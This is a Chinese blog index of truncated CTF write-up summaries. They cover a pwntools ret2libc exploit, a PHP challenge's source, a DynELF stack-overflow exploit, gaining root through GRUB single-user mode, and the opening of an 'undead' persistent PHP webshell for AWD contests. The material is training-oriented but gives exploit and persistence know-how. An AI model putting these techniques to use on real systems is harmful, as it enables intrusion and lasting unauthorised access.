摘要:
ret2libc 通过printf泄露read的函数地址计算libc的基址,ROP链构造system(‘/bin/sh’) from pwn import * r=remote('node3.buuoj.cn',26686) elf=ELF('./babyrop2') libc=ELF('./lib 阅读全文
摘要:
题目源码如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r') "welcome to t 阅读全文
摘要:
题目地址 本文参考 64位的程序,并且只有NX防护 用IDA可以看到主要的函数在sub_40063D,其中的参数从sub_40068E传入 那么a1就是v1,大小为0x40 a2就是200 题目存在read栈溢出漏洞,没有给libc,也没有直接利用的后门函数 但是有puts函数可以利用DynELF来 阅读全文
摘要:
打开虚拟机,在这个界面按下e 之后会进入这个界面,找到ro修改成 rw init=/sysroot/bin/sh 修改完之后用ctrl+X进入单用户模式,然后输入命令 chroot /sysroot 获得root权限 这样就可以修改里面的文件,或者修改root的密码 修改完重启虚拟机即可 阅读全文
摘要:
借鉴文章 不死马常用于AWD模式,用于权限维持,首先上传一个不死马,然后访问该页面,就会执行不死马,它会以进程的形式运行,不断的生成文件,即使被发现也不容易被删掉,同时注意上传的目录是否有权限 不死马 <?php set_time_limit(0); //PHP脚本限制了执行时间,set_time_ 阅读全文